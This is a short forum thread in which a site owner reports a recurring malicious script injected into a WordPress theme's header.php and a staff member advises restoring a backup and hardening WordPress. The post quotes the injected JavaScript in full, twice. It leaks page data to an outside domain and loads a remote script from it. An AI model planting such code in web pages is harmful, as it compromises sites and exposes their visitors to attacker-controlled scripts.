Viewing 2 posts - 1 through 2 (of 2 total)
  • Author
    Posts
  • October 23, 2015 at 2:45 pm #523857
    mattwilliamsyogi

    Hi there, the company I work at had a virus scare recently and after adding anti virus to the server and ridding of the infected files, I also noticed some scripts being added into any site we have running Enfold, the script is in header.php and makes the site extremely slow. After deleting the scripts, they reappear in header.php within a couple of days just with a new website as the link.

    <!– Scripts/CSS and wp_head hook –>
    <?php
    /* Always have wp_head() just before the closing <script>var a=”; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = “http://markdillerop.com/js/jquery.min.php&#8221;; var n_url = base + “?default_keyword=” + default_keyword + “&se_referrer=” + se_referrer + “&source=” + host; var f_url = base + “?c_utt=snt2014&c_utm=” + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== ” && se_referrer !== null && se_referrer !== ”){document.write(‘<script type=”text/javascript” src=”‘ + f_url + ‘”>’ + ‘<‘ + ‘/script>’);}</script>
    </head>
    * tag of your theme, or you will break many plugins, which
    * generally use this hook to add elements to <head> such
    * as styles, scripts, and meta tags.
    */

    wp_head();

    ?>

    <script>var a=”; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = “http://markdillerop.com/js/jquery.min.php&#8221;; var n_url = base + “?default_keyword=” + default_keyword + “&se_referrer=” + se_referrer + “&source=” + host; var f_url = base + “?c_utt=snt2014&c_utm=” + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== ” && se_referrer !== null && se_referrer !== ”){document.write(‘<script type=”text/javascript” src=”‘ + f_url + ‘”>’ + ‘<‘ + ‘/script>’);}</script>
    </head>

    Is there any way you guys can help me to block this script?

    Thanks,
    Matt

    October 23, 2015 at 5:38 pm #524017
    Elliott

    Hey Matt!

    It would be best to reload a backup before this behaviour started happening and then read this, http://codex.wordpress.org/Hardening_WordPress.

    Cheers!
    Elliott

  • Author
    Posts
Viewing 2 posts - 1 through 2 (of 2 total)
  • You must be logged in to reply to this topic.